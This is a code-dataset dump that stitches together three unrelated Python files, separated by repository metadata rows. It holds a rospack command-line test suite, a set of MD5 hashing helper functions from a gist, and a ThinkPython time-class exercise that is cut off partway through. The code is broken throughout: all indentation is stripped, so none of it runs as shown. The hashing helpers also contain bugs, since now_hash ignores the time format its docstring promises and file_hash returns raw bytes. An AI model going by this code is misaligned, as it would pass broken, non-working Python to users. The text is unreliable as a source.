del env[ROS_PACKAGE_PATH]
# Must split up the command string into its whitespace separated
# components; otherwise you get multiple words as one element of
# argv.
#args = ["rospack", command, pkgname]
args = [ROSPACK_PATH]
if command:
for s in command.split():
args.append(s)
if pkgname is not None:
args.append(pkgname)
p = Popen(args, stdout=PIPE, stderr=PIPE, env=env)
stdout, stderr = p.communicate()
# Also test command aliases, verifying that they give the same
# return code and console output
if command:
cmd = command.split()[-1]
if cmd in aliases:
args[-2] = aliases[cmd]
alias_p = Popen(args, stdout=PIPE, stderr=PIPE, env=env)
alias_stdout, alias_stderr = alias_p.communicate()
self.assertEquals(p.returncode, alias_p.returncode)
self.assertEquals(stdout, alias_stdout)
#self.assertEquals(stderr, alias_stderr)
# rospack should only yield non-negative return codes. A negative
# return code indicates a crash (e.g., SIGSEGV, SIGABORT), which is
# never ok.
if p.returncode < 0:
self.fail('rospack returned non-zero exit code (%d), indicating a crash'%(p.returncode))
return p.returncode, stdout.strip().decode('ascii'), stderr.decode('ascii')
################################################################################
# HELPER ROUTINES
# NOTE: helpers with the 'e' prefix take in environment parameters
## @return str: stdout
def run_rospack(self, pkgname, command):
rpp = os.path.abspath('test')
return self._run_rospack(rpp, pkgname, command)[1]
## @return str: stdout
def erun_rospack(self, ros_package_path, pkgname, command):
return self._run_rospack(ros_package_path, pkgname, command)[1]
## runs rospack with ROS_PACKAGE_PATH set to ./test
## @return int: status code
def run_rospack_status(self, pkgname, command):
rpp = os.path.abspath('test')
return self._run_rospack(rpp, pkgname, command)[0]
## @return int: status code
def erun_rospack_status(self, ros_package_path, pkgname, command):
return self._run_rospack(ros_package_path, pkgname, command)[0]
## assert that rospack fails on the specified args
def rospack_fail(self, package, command):
rpp = os.path.abspath('test')
code, stdout, stderr = self._run_rospack(rpp, package, command)
self.assertNotEquals(0, code, "rospack [%s %s] should have failed. \n\nstdout[%s] \n\nstderr[%s]"%(command, package, stdout, stderr))
## assert that rospack fails on the specified args. includes ROS_PACKAGE_PATH
def erospack_fail(self, ros_package_path, package, command):
code, stdout, stderr = self._run_rospack(ros_package_path, package, command)
self.assertNotEquals(0, code, "rospack [%s %s] should have failed instead of returning status code 0. \n\nstdout[%s] \n\nstderr[%s]"%(command, package, stdout, stderr))
## assert that rospack succeeds on the specified args
def rospack_succeed(self, package, command):
rpp = os.path.abspath('test')
status_code, stdout, stderr = self._run_rospack(rpp, package, command)
self.assertEquals(0, status_code, '"rospack %s %s" failed with status code [%s] instead of succeeding with [0]. \n\nstdout[%s] \n\nstderr[%s]'%(command, package, status_code, stdout, stderr))
## assert that rospack succeeds on the specified args
def erospack_succeed(self, ros_package_path, package, command):
status_code, stdout, stderr = self._run_rospack(ros_package_path, package, command)
self.assertEquals(0, status_code, "rospack [%s %s, env ROS_PACKAGE_PATH=%s] failed with status code [%s] instead of succeeding with [0]. \n\nstdout[%s] \n\nstderr[%s]"%(command, package, ros_package_path, status_code, stdout, stderr))
# helper routine that does return value validation where the return value from
# rospack is an unordered, line-separated list
def check_ordered_list(self, command, tests):
for retlist, package in tests:
expected = set(retlist)
self.rospack_succeed(package, command)
retval = self.strip_opt_ros(self.run_rospack(package, command))
retactual = [v for v in retval.split('\n') if v]
self.failIf(set(retlist) ^ set(retactual), "rospack %s %s failed: [%s] vs [%s]"%(command, package, retlist, retactual))
self.assertEquals('\n'.join(retlist), '\n'.join(retactual))
# variant of check_ordered_list that allows specifying ros_package_path.
# helper routine that does return value validation where the return value from
# rospack is an unordered, line-separated list
def echeck_ordered_list(self, command, tests):
for retlist, ros_package_path, package in tests:
expected = set(retlist)
self.erospack_succeed(ros_package_path, package, command)
retval = self.erun_rospack(ros_package_path, package, command)
retactual = [v for v in retval.split('\n') if v]
self.failIf(set(retlist) ^ set(retactual), "[env %s] rospack %s %s failed: [%s] vs [%s]"%(ros_package_path, command, package, retlist, retactual))
# variant that does not require ordering among the return values
def check_unordered_list(self, command, tests):
for retlist, package in tests:
expected = set(retlist)
self.rospack_succeed(package, command)
retval = self.run_rospack(package, command)
retactual = [v for v in retval.split('\n') if v]
self.failIf(set(retlist) ^ set(retactual), "rospack %s %s failed: [%s] vs [%s]"%(command, package, retlist, retactual))
#self.assertEquals('\n'.join(retlist), '\n'.join(retactual))
# variant that does not require ordering among the return values
def echeck_unordered_list(self, command, tests):
for retlist, ros_package_path, package in tests:
expected = set(retlist)
self.erospack_succeed(ros_package_path, package, command)
retval = self.erun_rospack(ros_package_path, package, command)
retactual = [v for v in retval.split('\n') if v]
self.failIf(set(retlist) ^ set(retactual), "rospack %s %s failed: [%s] vs [%s]"%(command, package, retlist, retactual))
#self.assertEquals('\n'.join(retlist), '\n'.join(retactual))
################################################################################
## ARG PARSING
def test_no_option(self):
self.rospack_succeed(None, None)
def test_fake_option(self):
self.rospack_fail("deps", "--fake deps")
def test_invalid_option(self):
self.rospack_fail("deps", "deps --lang=cpp --attrib=flags")
self.rospack_fail("deps", "deps --lang=cpp")
self.rospack_fail("deps", "deps --attrib=lflags")
self.rospack_fail("base", "export --lang=cpp --attrib=cflags --top=")
self.rospack_fail(None, "profile --length=")
self.rospack_fail(None, "deps --length=10")
self.rospack_fail(None, "deps --zombie-only")
self.rospack_fail(None, "profile --deps-only")
def test_ros_cache_timeout(self):
env = os.environ.copy()
os.environ['ROS_CACHE_TIMEOUT'] = '0'
self.rospack_succeed(None, "profile")
os.environ['ROS_CACHE_TIMEOUT'] = '-1'
self.rospack_succeed(None, "profile")
import time
time.sleep(0.1)
os.environ['ROS_CACHE_TIMEOUT'] = '.001'
self.rospack_succeed(None, "profile")
os.environ = env
def test_profile(self):
# TODO: test that the output is correct
self.rospack_succeed(None, "profile --zombie-only")
# TODO: test that the output is correct
self.rospack_succeed(None, "profile --length=10")
def test_ros_home(self):
env = os.environ.copy()
# Make sure we write to ROS_HOME, #2812.
d = tempfile.mkdtemp()
self.assertEquals(0, len(os.listdir(d)))
os.environ['ROS_HOME'] = d
self.rospack_succeed(None, "profile")
self.assertEquals(1, len(os.listdir(d)))
cache_path = os.path.join(d, os.listdir(d)[0])
self.assertEquals(True, os.path.exists(cache_path))
# Make sure we auto-create ROS_HOME
shutil.rmtree(d)
self.rospack_succeed(None, "profile")
self.assertEquals(True, os.path.exists(cache_path))
# Test with a corrupted cache
f = open(cache_path, 'w')
f.write('#SOMETHING\n')
f.close()
self.rospack_succeed(None, "list")
# Make sure we proceed when we can't write to ROS_HOME
os.chmod(d, 0000)
self.rospack_succeed(None, "profile")
# Delete the .ros directory, just in case this test is being run as
# root, in which case the above call will cause .ros to be created,
# despite the restrictive permissions that were set.
if os.path.exists(d):
os.chmod(d, 0o700)
shutil.rmtree(d)
# Make sure we proceed when we HOME/.ros isn't a directory
f = open(d, 'w')
f.close()
os.chmod(d, 0o700)
self.rospack_succeed(None, "profile")
# Make sure we proceed when neither HOME nor ROS_HOME is set
del os.environ['ROS_HOME']
del os.environ['HOME']
self.rospack_succeed(None, "profile")
# Clean up
os.unlink(d)
os.environ = env
def test_no_package_allowed(self):
self.rospack_succeed(None, "help")
self.rospack_succeed(None, "profile")
self.rospack_succeed(None, "list")
self.rospack_succeed(None, "list-names")
self.rospack_succeed(None, "list-duplicates")
self.rospack_succeed(None, "langs")
def test_no_package_allowed_bad(self):
self.rospack_fail("deps", "profile")
self.rospack_fail("deps", "list")
self.rospack_fail("deps", "list-names")
self.rospack_fail("deps", "list-duplicates")
self.rospack_fail("deps", "langs")
def test_export_bad(self):
self.rospack_fail("base", "export --lang= --attrib=lflags")
self.rospack_fail("base", "export --lang=cpp --attrib=")
self.rospack_fail("base", "export --attrib=lflags")
self.rospack_fail("base", "export --lang=cpp")
self.rospack_fail("base", "export --lang=cpp --lang=python --attrib=lflags")
self.rospack_fail("base", "export --lang=cpp --attrib=lflags --attrib=cflags")
self.rospack_fail("base", "export --lang=cpp --attrib=cflags --top=foo")
def test_plugins_bad(self):
self.rospack_fail("base", "plugins")
self.rospack_fail("base", "plugins --lang=cpp")
self.rospack_fail("base", "plugins --attrib=")
self.rospack_fail("base", "plugins --top=foo")
def test_rosdep(self):
self.rospack_succeed("base", "rosdep")
self.assertEquals("name: foo", self.run_rospack("base", "rosdep"))
self.rospack_succeed("deps", "rosdep0")
self.assertEquals("name: bar", self.run_rospack("deps", "rosdep0"))
self.check_unordered_list("rosdep", [(["name: foo", "name: bar"], "deps")])
################################################################################
## EXPORT
def test_export_cpp(self):
package = 'base'
tests = [("-lfoo", "export --lang=cpp --attrib=lflags"),
("-lfoo", "export --attrib=lflags --lang=cpp"),
("-Isomething", "export --lang=cpp --attrib=cflags"),
("-Isomething", "export --attrib=cflags --lang=cpp"),
]
for retval, arg in tests:
self.rospack_succeed(package, arg)
self.assertEquals(retval, self.strip_opt_ros(self.run_rospack(package, arg)))
self.assertEquals("-lfoo -lbar", self.strip_opt_ros(self.run_rospack("deps", "export --lang=cpp --attrib=lflags --deps-only")))
#TODO: test export with $prefix
def test_export_roslang(self):
package = 'base'
tests = [("something.cmake", "export --lang=roslang --attrib=cmake")]
for retval, arg in tests:
self.rospack_succeed(package, arg)
self.assertEquals(retval, self.strip_opt_ros(self.run_rospack(package, arg)))
def test_export_non_existent_attrib(self):
self.rospack_succeed("base", "export --lang=cpp --attrib=fake")
self.failIf(self.run_rospack("base", "export --lang=cpp --attrib=fake"))
################################################################################
## Plugins
def test_plugins(self):
tests = [(["deps foo.cmake", "plugins bat.cmake"], "base")]
self.check_unordered_list("plugins --attrib=cmake", tests)
package = 'base'
tests = [("deps foo.cmake", "plugins --attrib=cmake --top=deps")]
for retval, arg in tests:
self.rospack_succeed(package, arg)
self.assertEquals(retval, self.strip_opt_ros(self.run_rospack(package, arg)))
package = 'base_two'
tests = [("deps bar.cmake", "plugins --attrib=cmake")]
for retval, arg in tests:
self.rospack_succeed(package, arg)
self.assertEquals(retval, self.strip_opt_ros(self.run_rospack(package, arg)))
################################################################################
## ENVIRONMENT TEST
## test rospack with ROS_PACKAGE_PATH set
def test_ros_package_path(self):
testp = os.path.abspath('test')
tests = [
(["base", "base_two"], testp, "deps"),
]
self.echeck_ordered_list("deps", tests)
## tests internal rpp precedence (#2854)
def test_ros_package_path_precedence(self):
teste = os.path.abspath('test_empty')
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
testp_roslang = os.path.join(testp, 'roslang')
test2p_roslang = os.path.join(test2p, 'roslang')
tests = [([testp_roslang], teste + ':' + ':'.join([testp, test2p]), "roslang"),
([testp_roslang], teste + ':' + ':'.join([testp, test2p_roslang]), "roslang"),
([testp_roslang], teste + ':' + ':'.join([testp_roslang, test2p]), "roslang"),
([testp_roslang], teste + ':' + ':'.join([testp_roslang, test2p_roslang]), "roslang")]
self.echeck_unordered_list('find', tests)
## tests rpp vs rr precedence
def test_ros_package_path_precedence_1(self):
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
test3p = os.path.abspath('test3')
tests = [
(["test"], testp + ':' + test2p, "precedence1"),
(["test2"], test2p + ':' + testp, "precedence1"),
(["test2"], testp + ':' + "%s:%s"%(test2p, test3p), "precedence2"),
(["test3"], testp + ':' + "%s:%s"%(test3p, test2p), "precedence2"),
]
self.echeck_ordered_list('libs-only-l', tests)
## tests list-duplicates
def test_list_duplicates(self):
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
test3p = os.path.abspath('test3')
self.erospack_succeed(testp, None, 'list-duplicates')
self.erospack_succeed(testp + ':' + '%s:%s'%(test2p,test3p), None, 'list-duplicates')
# test ability to point ros_package_path directly at package
def test_ros_package_path_direct_package(self):
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
test3p = os.path.abspath('test3')
# point directly at precedence 2/3
rpp = ':'.join([os.path.join(test2p, 'precedence2'),os.path.join(test3p, 'precedence3')])
tests = [
(["test2"], testp + ':' + rpp, "precedence2"),
(["test3"], testp + ':' + rpp, "precedence3"),
]
self.echeck_ordered_list('libs-only-l', tests)
def test_ros_package_path_colons(self):
# scatter some colons into ros package path to make sure rospack doesn't mind
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
# Add a trailing slash, to make sure that it gets removed
test3p = os.path.abspath('test3') + '/'
tests = [
(["base","base_two"], testp + ':' + "::%s:::"%testp, "deps"),
(["base","base_two"], testp + ':' + "::", "deps"),
]
self.echeck_ordered_list('deps', tests)
tests = [
(["test"], testp + ':' + ":::%s:"%test2p, "precedence1"),
(["test2"],testp + ':' + "::%s::%s::"%(test2p,test3p), "precedence2"),
]
self.echeck_ordered_list("libs-only-l", tests)
def test_ros_package_path_bad_paths(self):
testp = os.path.abspath('test')
test2p = os.path.abspath('test2')
non_existentp = os.path.abspath('test')
tests = [
(["test"], testp + ':' + non_existentp, "precedence1"),
(["test2"],testp + ':' + ":%s:%s"%(non_existentp, test2p), "precedence2"),
(["test2"],testp + ':' + ":%s:%s"%(test2p, non_existentp), "precedence2"),
]
self.echeck_ordered_list("libs-only-l", tests)
# Test rospack from within a package
def test_ros_in_package(self):
pwd = os.getcwd()
rpp = os.path.join(pwd, 'test')
os.chdir(os.path.abspath(os.path.join('test', 'deps')))
self.erospack_succeed(rpp, None, 'depends1')
self.echeck_unordered_list('depends1', [(["base", "base_two"], rpp, None)])
# Check what happens when we're in an unlinked directory
d = tempfile.mkdtemp()
os.chdir(d)
os.rmdir(d)
self.erospack_fail(rpp, None, 'depends1')
os.chdir(pwd)
################################################################################
## rospack list
def _rospack_list(self, ros_package_path):
env = os.environ.copy()
if ros_package_path is not None:
env[ROS_PACKAGE_PATH] = ros_package_path
elif ROS_PACKAGE_PATH in env:
del env[ROS_PACKAGE_PATH]
args = [ROSPACK_PATH, 'list']
p = Popen(args, stdout=PIPE, stderr=PIPE, env=env)
retval = p.communicate()[0]
return p.returncode, retval.strip().decode('ascii')
def _check_rospack_list(self, expected, retval):
lines = [l for l in retval.split('\n') if l]
packages = [l[:l.find(' ')] for l in lines]
# canonicalize paths
paths = [os.path.abspath(l[l.find(' ')+1:]) for l in lines]
result = {}
for pack, path in zip(packages, paths):
result[pack] = os.path.abspath(path)
self.failIf(set(expected.keys()) ^ set(packages), "package lists do not match (expected vs. actual): %s vs %s"%(expected.keys(), packages))
for pack,path in expected.items():
self.assertEquals(path, result[pack])
## test rospack list on an empty tree
def test_rospack_list_empty(self):
rpp = os.path.abspath('test_empty')
retcode, retval = self._rospack_list(rpp)
self.assertEquals(0, retcode)
self.failIf(retval, "rospack list on empty directory returned value %s"%retval)
## test rospack depends-on1 in a directory that's not a package (#2556)
def test_rospack_depends_on_not_a_package(self):
pwd = os.getcwd()
rpp = os.path.abspath('test')
os.chdir(os.path.abspath('/'))
self.erospack_fail(rpp, None, 'depends-on1')
os.chdir(pwd)
# test that rospack list removes duplicates
def test_rospack_list_dups(self):
# make sure result is same if ROS_ROOT=ROS_PACKAGE_PATH
rpp = os.path.abspath('structure_test')
retcode, retval = self._rospack_list(rpp)
self.assertEquals(0, retcode)
def test_rospack_list_no_rpp(self):
rpp = os.path.abspath('structure_test')
expected = structure_test.copy()
retcode, retval = self._rospack_list(rpp)
self.assertEquals(0, retcode)
self._check_rospack_list(expected, retval)
#TODO: symlink test
#TODO: test with ros package path
################################################################################
## rospack list-names
def _rospack_list_names(self, ros_package_path):
env = os.environ.copy()
if ros_package_path is not None:
env[ROS_PACKAGE_PATH] = ros_package_path
elif ROS_PACKAGE_PATH in env:
del env[ROS_PACKAGE_PATH]
args = [ROSPACK_PATH, 'list-names']
p = Popen(args, stdout=PIPE, stderr=PIPE, env=env)
retval = p.communicate()[0]
return p.returncode, retval.strip().decode('ascii')
## test rospack list-names on an empty tree
def test_rospack_list_names_empty(self):
rpp = os.path.abspath('test_empty')
retcode, retval = self._rospack_list_names(rpp)
self.assertEquals(0, retcode)
self.failIf(retval, "rospack list-names on empty directory returned value %s"%retval)
# test that rospack list removes duplicates
def test_rospack_list_names_dups(self):
# make sure result is same if ROS_ROOT=ROS_PACKAGE_PATH
rpp = os.path.abspath('structure_test')
retcode, retval = self._rospack_list_names(rpp)
self.assertEquals(0, retcode)
retcode2, retval2 = self._rospack_list_names(rpp)
self.assertEquals(0, retcode2)
self.assertEquals(retval, retval2, "rospack list-names did not remove duplicates")
def test_rospack_list_names_no_rpp(self):
rpp = os.path.abspath('structure_test')
expected = set(structure_test.copy().keys())
retcode, retval = self._rospack_list_names(rpp)
self.assertEquals(0, retcode)
self.assertEquals(expected, set(retval.split()))
#TODO: symlink test
#TODO: test with ros package path
################################################################################
## rospack find
## test rospack find on non-existent package
def test_rospack_find_fail(self):
rpp = os.path.abspath('test_empty')
self.erospack_fail(rpp, 'package', 'find')
## test rospack find with ros_package_path set directly to a package
def test_rospack_find_direct(self):
testp = os.path.abspath('test')
package1p = os.path.abspath(os.path.join('structure_test', 'package1'))
self.erospack_succeed(testp + ':' + package1p, 'package1', 'find')
self.assertEquals(package1p, self.erun_rospack(testp + ':' + package1p, 'package1', 'find'))
## test rospack find with ros_package_path set directly to a package,
## where that package contains a rospack_nosubdirs file, #3191.
def test_rospack_find_direct_with_rospack_nosubdirs(self):
testp = os.path.abspath('test')
package2p = os.path.abspath(os.path.join('structure_test', 'package2'))
self.erospack_succeed(testp + ':' + package2p, 'package2', 'find')
self.assertEquals(package2p, self.erun_rospack(testp + ':' + package2p, 'package2', 'find'))
def test_rospack_find_no_rpp(self):
rpp = os.path.abspath('structure_test')
expected = structure_test.copy()
for package,path in expected.items():
self.erospack_succeed(rpp, package, 'find')
self.assertEquals(path, os.path.abspath(self.erun_rospack(rpp, package, 'find')))
#TODO: symlink test
#TODO: test with ros package path
################################################################################
## DEPENDENCIES
def test_deps(self):
depth_list = ['depth-%s'%i for i in range(1, 101)]
depth_list.reverse()
tests = [
(["base","base_two"], "deps"),
(["base","base_two","deps"], "deps_higher"),
(["base","base_two","deps","deps_higher"],"deps_dup"),
(depth_list, "depth-0")
]
self.check_ordered_list('deps', tests)
def test_deps1(self):
tests = [
(["base","base_two"], "deps"),
(["deps"], "deps_higher"),
(["depth-1"], "depth-0"),
(["depth-99"], "depth-98"),
]
self.check_ordered_list('deps1',tests)
def test_deps_invalid(self):
self.rospack_fail("deps_invalid", "deps")
def test_depends_on(self):
depth_list = ['depth-%s'%i for i in range(0, 100)]
depth_list.reverse()
self.rospack_succeed("deps", "depends-on")
tests = [
(["plugins", "deps_dup", "deps", "deps_higher"], "base"),
(["deps_higher","deps_dup"], "deps"),
([], "depth-0"),
(depth_list, "depth-100"),
]
self.check_unordered_list("depends-on", tests)
def test_depends_on1(self):
# sanity check first
self.rospack_succeed("deps", "depends-on")
tests = [
(["deps_higher"], "deps"),
(["deps", "deps_dup", "plugins"], "base"),
(["deps", "deps_dup"], "base_two"),
]
self.check_unordered_list("depends-on1", tests)
def test_depends_on_nonexistent(self):
self.rospack_fail("deps", "deps_nonexistent")
self.rospack_fail("deps", "nonexistentpackage")
tests = [
(["deps_nonexistent"], "nonexistentpackage"),
]
self.check_ordered_list("depends-on", tests)
def test_lflags_base(self):
self.rospack_succeed("base", "libs-only-l")
self.assertEquals("foo", self.run_rospack("base", "libs-only-l"))
def test_circular(self):
testp = os.path.abspath("test")
self.erospack_fail(testp + ':' + os.path.abspath("test_circular/cycle0"), "self_ref", "deps")
self.erospack_fail(testp + ':' + os.path.abspath("test_circular/cycle1"), "friend1", "deps")
self.erospack_fail(testp + ':' + os.path.abspath("test_circular/cycle1"), "friend2", "deps")
self.erospack_fail(testp + ':' + os.path.abspath("test_circular/cycle2"), "friend1", "deps")
self.erospack_fail(testp + ':' + os.path.abspath("test_circular/cycle2"), "friend2", "deps")
self.erospack_fail(testp + ':' + os.path.abspath("test_circular/cycle2"), "friend3", "deps")
self.erospack_fail(testp + ':' + os.path.abspath("test_circular/cycle2"), "friend3", "depends-on")
def test_lflags_backquote(self):
self.rospack_succeed("backquote", "libs-only-l")
self.assertEquals("loki foo backquote", self.run_rospack("backquote", "libs-only-l"))
def test_backquote_invalid(self):
self.rospack_fail("backquote_invalid", "libs-only-other")
# Strip out '/opt/ros' and friends from flags before checking them
def strip_opt_ros(self, flags):
prefix = '/opt/ros'
if 'ROS_BINDEPS_PATH' in os.environ:
prefix = os.environ['ROS_BINDEPS_PATH']
tostrip = [prefix + '/lib',
prefix + '/include',
'-L' + prefix + '/lib',
'-I' + prefix + '/include',
'-Wl,-rpath,' + prefix + '/lib']
res = ''
for f in flags.split(' '):
if f and f not in tostrip:
if len(res) > 0:
res += ' '
res += f
return res
def test_Lflags_backquote(self):
self.rospack_succeed("backquote", "libs-only-L")
self.assertEquals("odin", self.strip_opt_ros(self.run_rospack("backquote", "libs-only-L")))
def test_cflags_backquote(self):
self.rospack_succeed("backquote", "cflags-only-I")
self.assertEquals("blah backquote", self.strip_opt_ros(self.run_rospack("backquote", "cflags-only-I")))
def test_cflags_platform_specific(self):
self.rospack_succeed("platform_specific_exports", "cflags-only-other")
myos = platform.system()
if myos == 'Linux':
self.assertEquals("-DLINUX", self.run_rospack("platform_specific_exports", "cflags-only-other"))
elif myos == 'Darwin':
self.assertEquals("-DAPPLE", self.run_rospack("platform_specific_exports", "cflags-only-other"))
elif myos == 'Windows':
self.assertEquals("-DWINDOWS", self.run_rospack("platform_specific_exports", "cflags-only-other"))
else:
self.assertEquals("-DOTHER", self.run_rospack("platform_specific_exports", "cflags-only-other"))
self.assertEquals("blah backquote", self.strip_opt_ros(self.run_rospack("backquote", "cflags-only-I")))
def test_lflags_archive(self):
self.rospack_succeed("lflags_with_archive_lib", "libs-only-l")
self.assertEquals("/usr/lib/libfoo.a", self.run_rospack("lflags_with_archive_lib", "libs-only-l"))
self.rospack_succeed("lflags_with_archive_lib", "libs-only-other")
self.assertEquals("/a/bad/flag", self.run_rospack("lflags_with_archive_lib", "libs-only-other"))
def test_lflags_deps(self):
self.rospack_succeed("deps", "libs-only-l")
self.assertEquals("loki foo bar", self.run_rospack("deps", "libs-only-l"))
def test_lflags_deps_only(self):
self.rospack_succeed("deps", "libs-only-l --deps-only")
self.assertEquals("foo bar", self.run_rospack("deps", "libs-only-l --deps-only"))
def test_empty_lflags(self):
tests = [([], "deps_empty")]
commands = ["libs-only-l", "libs-only-L", "libs-only-other"]
for c in commands:
self.check_ordered_list(c, tests)
def test_empty_cflags(self):
tests = [([], "deps_empty")]
commands = ["cflags-only-I", "cflags-only-other"]
for c in commands:
self.check_ordered_list(c, tests)
def test_empty_vcs(self):
self.rospack_succeed("empty", "vcs0")
self.assertEquals("type: \turl:", self.run_rospack("empty", "vcs0"))
self.rospack_succeed("deps_empty", "vcs")
self.assertEquals("type: svn\turl: \ntype: \turl:", self.run_rospack("deps_empty", "vcs"))
def test_vcs_no_type_or_url(self):
self.rospack_succeed("vc_no_type_or_url", "vcs0")
self.assertEquals("", self.run_rospack("vc_no_type_or_url", "vcs0"))
def test_lflags_no_package_attrib(self):
self.rospack_fail("no_package_attribute", "libs-only-l")
def test_lflags_invalid(self):
self.rospack_fail("invalid", "libs-only-l")
def test_vcs_invalid(self):
self.rospack_fail("invalid", "vcs")
def test_deps1_invalid(self):
self.rospack_fail("invalid", "deps1")
def test_vcs0_deps(self):
self.rospack_succeed("deps", "vcs0")
self.failIf(self.run_rospack("deps", "vcs0"))
def test_vcs_deps(self):
self.rospack_succeed("deps", "vcs")
self.assertEquals("type: svn\turl: https://ros.svn.sourceforge.net/svnroot/ros/trunk\n"+
"type: svn\turl: https://ros.svn.sourceforge.net/svnroot/ros/branches", self.run_rospack("deps", "vcs"))
def test_deps_manifests(self):
self.rospack_succeed("deps", "deps-manifests")
testp = os.path.abspath('test')
expected = os.path.join(testp, 'base/manifest.xml') + ' ' + os.path.join(testp, 'base_two/manifest.xml')
self.assertEquals(expected,
self.run_rospack("deps", "deps-manifests"))
def test_deps_indent(self):
self.rospack_succeed("deps_higher", "deps-indent")
testp = os.path.abspath('test')
expected = 'deps\n base\n base_two'
self.assertEquals(expected,
self.run_rospack("deps_higher", "deps-indent"))
def _rospack_langs(self, ros_package_path, ros_lang_disable):
env = os.environ.copy()
if ros_package_path is not None:
env[ROS_PACKAGE_PATH] = ros_package_path
elif ROS_PACKAGE_PATH in env:
del env[ROS_PACKAGE_PATH]
if ros_lang_disable is not None:
env[ROS_LANG_DISABLE] = ros_lang_disable
elif ROS_LANG_DISABLE in env:
del env[ROS_LANG_DISABLE]
args = [ROSPACK_PATH, 'langs']
p = Popen(args, stdout=PIPE, stderr=PIPE, env=env)
retval = p.communicate()[0]
return p.returncode, retval.strip().decode('ascii')
def test_langs(self):
rpp = os.path.abspath('test')
retcode, retval = self._rospack_langs(rpp, None)
self.assertEquals(0, retcode)
# No guarantees on ordering of lang result
l = retval.split()
s = set(l)
expected = set(['rosfoo', 'rosbar'])
self.assertEquals(s, expected)
def test_langs_disable(self):
rpp = os.path.abspath('test')
disable = 'rosfoo'
retcode, retval = self._rospack_langs(rpp, disable)
self.assertEquals(0, retcode)
# No guarantees on ordering of lang result
l = retval.split()
s = set(l)
expected = set(['rosbar'])
self.assertEquals(s, expected)
def test_langs_empty(self):
rpp = os.path.abspath('test2')
retcode, retval = self._rospack_langs(rpp, None)
self.assertEquals(0, retcode)
self.failIf(retval, "rospack langs on empty directory returned value %s"%retval)
# Test auto-inclusion of msg_gen include directories, #3018
def test_msg_gen(self):
test_path = os.path.abspath('test')
pkgs = ['msg_gen_no_export', 'msg_gen_no_cpp', 'msg_gen_no_cflags']
for p in pkgs:
self.rospack_succeed(p, "cflags-only-I")
self.assertEquals(os.path.join(test_path, p, "msg_gen/cpp/include"), self.strip_opt_ros(self.run_rospack(p, "cflags-only-I")))
# Also test that we don't get auto-inclusion of msg_gen when we're
# asking for a different lang / attrib, #3884
pkg = 'msg_gen_no_cpp'
cmd = 'export --lang=cpp --attrib=lflags'
self.rospack_succeed(pkg, cmd)
self.assertEquals('', self.strip_opt_ros(self.run_rospack(pkg, cmd)))
cmd = 'export --lang=foo --attrib=bar'
self.rospack_succeed(pkg, cmd)
self.assertEquals('bat', self.run_rospack(pkg, cmd))
# Test that -q option suppresses errors, #3177.
def test_quiet_option(self):
rpp = os.path.abspath('test')
# With -q: look for non-existent package, make sure that it fails, yet
# produces nothing on stderr.
status_code, stdout, stderr = self._run_rospack(rpp, 'nonexistentpackage', 'find -q')
self.assertNotEquals(0, status_code)
self.assertEquals(0, len(stderr))
# Without -q: look for non-existent package, make sure that it fails,
# and produces somthing on stderr.
status_code, stdout, stderr = self._run_rospack(rpp, 'nonexistentpackage', 'find')
self.assertNotEquals(0, status_code)
self.assertNotEquals(0, len(stderr))
| [
"[email protected]"
] | |
a570f27a7c1170f47520d0fd62cc5ef08e71442c | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /all-gists/833679/snippet.py | 4ab198d900965b661dbb57b70023f8d4c2106db6 | [
"MIT"
] | permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 2,067 | py | #
# HashUtils - Simple functions derivated from standard Python hashlib.
#
__author__ = 'Mauro Baraldi ([email protected])'
__version__ = '0.0.2: February 17, 2011'
import re
import hashlib
from datetime import datetime
class Hash:
"""Common facilities using hashlib standard lib. Algotrithm used in all
methods: MD5
Returns of method is hashlib.md5(object_to_hash).hexdigest()
Example of use:
from hashutils import Hash
h = Hash()
>>> h.now_hash()
'b3036f7831dc1394f1dcb6b989561d79'
>>> h.today_hash()
'b3036f7831dc1394f1dcb6b989561d79'
>>> h.string_hash("My name is Earl.")
'ad05d8348194adf6d6190a2ae550e099'
>>> h.file_hash('/home/mauro/passwords.txt')
'404627e52574140007692512e3ce2fa9'
>>> h.file_hash('/home/mauro/passwords.txt', 1024)
'997dd0044bc676fdf3f9db0560e642d0'
>>> h.from_date_hash((2001, 3, 1, 12, 45), '%Y/%m/%d %H:%M')
'fc573499016722e5ff0747f2dc7f4971'
"""
def __init__(self):
pass
def today_hash(self):
""" Return hash form datetime.today() function in format %Y%m%d """
self.today = datetime.today().strftime('%Y%m%d')
return hashlib.md5(self.today).hexdigest()
def now_hash(self):
""" Return hash form datetime.today() function in format %Y%m%d%H%M%S """
self.today = datetime.today().strftime('%Y%m%d')
return hashlib.md5(self.today).hexdigest()
def from_date_hash(self, date, strfmt):
""" Return hash form date in datetime.date format (%Y%m%d) """
self.format = re.compile('[a-zA-z]').sub('d', strfmt)
self.build_date = datetime.strptime(self.format % date, strfmt)
self.date = self.build_date.strftime(strfmt)
return hashlib.md5(self.date).hexdigest()
def string_hash(self, string):
""" Return hash form a given string. """
return hashlib.md5(string).hexdigest()
def file_hash(self, fp, size=128):
""" Return hash form a given file. Default first 128 bytes."""
with open(fp, 'r+') as temp:
return hashlib.md5(temp.read(size)).digest()
| [
"[email protected]"
] | |
a5ba5bef1c1edc9aa06f3fe87232501307f1a1b2 | c61c9bedba1968bfaf571ac3996b696fc35890a6 | /Chapter16/16-3.py | ce29436d126c588d3560f122a3141296ca60d21e | [] | no_license | ArunRamachandran/ThinkPython-Solutions | 497b3dbdeba1c64924fe1d9aa24204a9ca552c5b | 1a0872efd169e5d39b25134960168e3f09ffdc99 | refs/heads/master | 2020-04-01T10:23:20.255132 | 2014-11-07T17:04:52 | 2014-11-07T17:04:52 | 25,806,318 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 652 | py | class Time(object):
''' to represent the time of a day '''
t1 = Time()
t2 = Time()
t1.h = 4
t1.m = 185
t1.s = 0
t2.h = 1
t2.m = 56
t2.s = 0
def add_time(t1,t2):
sum_time = Time()
